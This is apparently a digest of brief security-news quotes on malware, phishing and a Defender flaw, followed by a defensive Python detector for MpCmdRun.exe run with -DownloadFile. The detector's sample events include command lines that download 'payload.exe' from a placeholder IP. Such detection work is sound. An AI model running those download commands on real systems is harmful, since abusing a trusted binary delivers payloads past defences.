The researcher Steven Seeley: It’s due to improper validation of cmdlet arguments. Exploitation requires an authenticated user in a certain role. Patches have been released.
Microsoft cyber security experts: Foreign activity stepped up targeting the 2020 vote. It's the work of well-known actors such as Strontium, Zirconium and Phosphorus.
Zscaler cyber security experts: The malware poses as faulty software, but meanwhile hides in the device and starts working. Its brain is the "MainService".
The cyber security expert JAMESWT: The malware infection chain is activated if the victim enables macros in an attachment related to a fake request by a real company.
Atlas VPN cyber security experts: The country in the last 31 days suffered 2.1 million aggressions. Some are for cyber-espionage purposes, others for cybercrime.
Palo Alto Networks cyber security experts: The malware was configured to overwrite the master boot record (MBR), and contains network-spreading functionality.
Cybereason cyber security experts: The malware, written in Python, has different functionalities. The chain of infection and the infrastructure have also changed.
Cofense cyber security experts: An email alerts the victim to three messages at risk and asks them to click a link. This leads to a real company's page with a fake login panel.
Mohammad Askar: A recent update includes a new -DownloadFile command-line argument. Bleeping Computer: It allows local users to use MpCmdRun.exe to download files from a remote location.
Proofpoint cyber security experts: The malware has been distributed in two different Covid-19-themed campaigns. One targeted many organisations in the EU. The other targeted Tibetan dissidents.
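A detection a SOC would want for the item above: flag process-creation events in which Microsoft Defender's MpCmdRun.exe is launched with the -DownloadFile argument, which turns a signed, trusted binary into a file downloader. This is an added example and not code from the page, from Mohammad Askar or from Bleeping Computer. The sample events are constructed to resemble Sysmon Event ID 1 / Windows 4688 fields, and the -url / -path arguments in them are assumed for illustration; only the -DownloadFile flag itself is stated on the page.

```python
"""Flag MpCmdRun.exe invocations that carry the -DownloadFile argument.

Added example: the event records below are constructed sample data shaped
like Sysmon Event ID 1 (process creation) fields, not real telemetry.
"""
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample events. The -url/-path argument names are an assumption
# for illustration; the page itself only names the -DownloadFile flag.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
     "ParentImage": r"C:\Windows\System32\svchost.exe"},          # benign scheduled scan
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r"MpCmdRun.exe -DownloadFile -url http://203.0.113.10/payload.exe -path C:\Users\Public\a.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},              # download via LOLBin
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe",
     "CommandLine": r"mpcmdrun.exe  -downloadfile  -url https://203.0.113.10/x.bin -path c:\temp\x.bin",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},  # mixed case, extra spaces
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo -DownloadFile",
     "ParentImage": r"C:\Windows\explorer.exe"},                  # same token, wrong binary
]

# The flag may be written -DownloadFile or /DownloadFile, in any case, and must
# stand alone as an argument (not be embedded inside another token).
_DOWNLOAD_FLAG = re.compile(r"(?<![\w-])[-/]downloadfile\b", re.IGNORECASE)
_URL_ARG = re.compile(r"-url\s+(\S+)", re.IGNORECASE)   # assumed argument name


def is_mpcmdrun(image: str) -> bool:
    """True when the executed image's file name is MpCmdRun.exe (case-insensitive).

    Compares the basename only, so the Platform\<version>\ install path of
    Defender platform updates is covered as well as the Program Files path.
    """
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return basename.lower() == "mpcmdrun.exe"


def extract_url(cmdline: str) -> Optional[str]:
    """Pull the remote URL out of the command line, if an -url argument is present."""
    m = _URL_ARG.search(cmdline)
    return m.group(1) if m else None


def detect(events: Iterable[Dict[str, str]]) -> List[Dict[str, Optional[str]]]:
    """Return one finding per event where MpCmdRun.exe was run with -DownloadFile."""
    hits: List[Dict[str, Optional[str]]] = []
    for ev in events:
        image = ev.get("Image", "")
        cmdline = ev.get("CommandLine", "")
        if not is_mpcmdrun(image):
            continue                      # ignore other binaries echoing the token
        if not _DOWNLOAD_FLAG.search(cmdline):
            continue                      # normal scan / signature-update usage
        hits.append({
            "image": image,
            "parent": ev.get("ParentImage"),
            "url": extract_url(cmdline),
            "command_line": cmdline,
        })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"ALERT MpCmdRun download: parent={hit['parent']} url={hit['url']}")
```

Matching on the image name alone is bypassable by copying the binary under another name; in Sysmon Event ID 1 the OriginalFileName field (taken from the PE version resource) survives a rename and is the better key in production. The parent process is kept in the finding because an interactive shell or Office process spawning MpCmdRun.exe is far more suspicious than the Defender service itself.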